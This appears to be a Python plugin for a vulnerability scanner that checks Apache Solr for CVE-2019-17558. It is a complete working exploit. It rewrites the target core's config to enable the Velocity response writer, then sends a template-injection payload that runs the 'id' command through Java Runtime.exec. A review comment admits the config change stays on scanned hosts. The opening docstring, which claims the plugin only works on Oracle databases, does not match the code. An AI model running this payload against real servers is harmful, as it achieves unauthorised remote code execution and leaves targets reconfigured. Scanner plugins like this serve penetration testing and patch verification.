#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
注意！只能对oracle数据库起作用
'''
__author__ = 'Ascotbe'  # plugin author
__times__ = '2019/10/13 22:12 PM'  # authoring timestamp, free-form as the author wrote it (non-standard dunder)
import requests
import json
from ClassCongregation import VulnerabilityDetails,UrlProcessing,ErrorLog,WriteFile,ErrorHandling
import urllib3
# Silence the InsecureRequestWarning that requests/urllib3 emits for the
# verify=False calls made in medusa(); certificate checks stay disabled there.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

class VulnerabilityInfo(object):
    """Plugin descriptor for the CVE-2019-17558 check, exposed as ``self.info``.

    ``Medusa`` is the evidence string assembled by :func:`medusa` and is stored
    under the ``details`` key; every other field is a fixed attribute of the
    plugin (identifier, author, dates, affected component, severity, advice).
    """

    def __init__(self, Medusa):
        # Key meanings (translated from the original inline comments):
        #   number       - CVE id; 0 when there is neither CVE nor CNVD, CVE preferred over CNVD
        #   author       - plugin author
        #   create_date  - date the plugin was written
        #   disclosure   - disclosure date (plugin date if unknown)
        #   algroup      - plugin name
        #   name         - vulnerability name
        #   affects      - affected component
        #   desc_content - vulnerability description
        #   rank         - severity
        #   suggest      - remediation advice
        #   version      - affected version range
        #   details      - scan result / evidence
        # Insertion order is kept identical to the original so iteration matches.
        self.info = {
            'number': "CVE-2019-17558",
            'author': "Ascotbe",
            'create_date': "2020-1-3",
            'disclosure': '2019-12-30',
            'algroup': "SolrVelocityTemplateRemoteCodeExecutionVulnerability",
            'name': 'SolrVelocity模板远程代码执行漏洞',
            'affects': "Solr",
            'desc_content': "由于更新修复不完全，导致漏洞再次被利用",
            'rank': "高危",
            'suggest': "尽快升级最新系统",
            'version': "5.0.0 <= Apache Solr <= 8.3.1",
            'details': Medusa,
        }


# Solr Config API body that registers solr.VelocityResponseWriter with
# parameter-based template loading enabled. Not referenced anywhere in this
# file: medusa() embeds the same body inline as ``payload_data``.
payload1='''{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}'''

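def medusa(**kwargs)->None:
    """Check one target for CVE-2019-17558 (Solr VelocityResponseWriter RCE) and record a hit.

    Flow: list cores via ``/solr/admin/cores``, take the last core listed, POST
    a Config API change that enables ``solr.VelocityResponseWriter`` with
    parameter-based template loading, then request a Velocity template and
    treat a 200 response containing ``uid=``, ``gid=`` and ``groups=`` as
    confirmation. A hit is passed to ``VulnerabilityDetails`` and ``WriteFile``;
    any exception is routed to ``ErrorHandling``/``ErrorLog`` and swallowed, so
    the plugin never raises to the framework.

    Keyword args:
        Url: target base URL (scheme and host, no trailing path).
        Headers: header dict supplied by the framework; copied, never mutated.
        Proxies: ``requests``-style proxies mapping, may be None.

    Returns:
        None.
    """
    url = kwargs.get("Url")  # target base URL
    Headers = kwargs.get("Headers")  # headers supplied by the framework
    proxies = kwargs.get("Proxies")  # proxy settings supplied by the framework
    try:
        # Work on private copies. The original aliased the caller's dict twice,
        # so the second Content-Type assignment overwrote the first and the
        # caller's Headers were modified as a side effect.
        form_headers = dict(Headers) if Headers else {}
        form_headers['Content-Type'] = 'application/x-www-form-urlencoded'
        json_headers = dict(Headers) if Headers else {}
        json_headers['Content-Type'] = 'application/json'

        # verify=False matches the other two requests and the warning
        # suppression at import time; without it an https target with a
        # self-signed certificate aborted the check before anything was tested.
        cores_resp = requests.get(url + '/solr/admin/cores', timeout=6, proxies=proxies,
                                  headers=form_headers, verify=False)
        data = json.loads(cores_resp.text)
        if not isinstance(data, dict) or 'status' not in data:
            return

        # Same selection as the original: the last core in the status map.
        name = ''
        for core in data['status']:
            name = core
        if not name:
            return  # no cores reported; '/solr//config' would be malformed

        config_url = url + "/solr/" + name + "/config"
        verify_url = url + '/solr/' + name + '/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'
        # Config API body enabling the Velocity writer. NOTE(review): this is a
        # persistent change to the target's core config and is not reverted by
        # this plugin, so scanned hosts are left with the writer enabled.
        payload_data = """{
              "update-queryresponsewriter": {
                "startup": "lazy",
                "name": "velocity",
                "class": "solr.VelocityResponseWriter",
                "template.base.dir": "",
                "solr.resource.loader.enabled": "true",
                "params.resource.loader.enabled": "true"
              }
            }"""
        requests.post(config_url, data=payload_data, headers=json_headers,
                      proxies=proxies, timeout=6, verify=False)
        # Content-Type is irrelevant on a GET; form_headers is used only to
        # keep the caller-supplied headers on the request.
        resp2 = requests.get(verify_url, headers=form_headers, timeout=6,
                             proxies=proxies, verify=False)
        con2 = resp2.text
        markers = ("uid=", "groups=", "gid=")
        if resp2.status_code == 200 and all(m in con2 for m in markers):
            Medusa = "{} 存在SolrVelocity模板远程代码执行漏洞(CVE-2019-17558)\r\n验证数据:\r\n使用Payload:\r\n{}回显内容:{}\r\n".format(url, verify_url, con2)
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, resp2, **kwargs).Write()  # hand url and evidence to the framework
            WriteFile().result(str(url), str(Medusa))  # url is the per-target file name, Medusa the result
    except Exception as e:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, plugin_name)
        # str(url): a missing Url kwarg must not raise a second TypeError here.
        ErrorLog().Write("Plugin Name:" + plugin_name + " || Target Url:" + str(url), e)  # write to the error log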

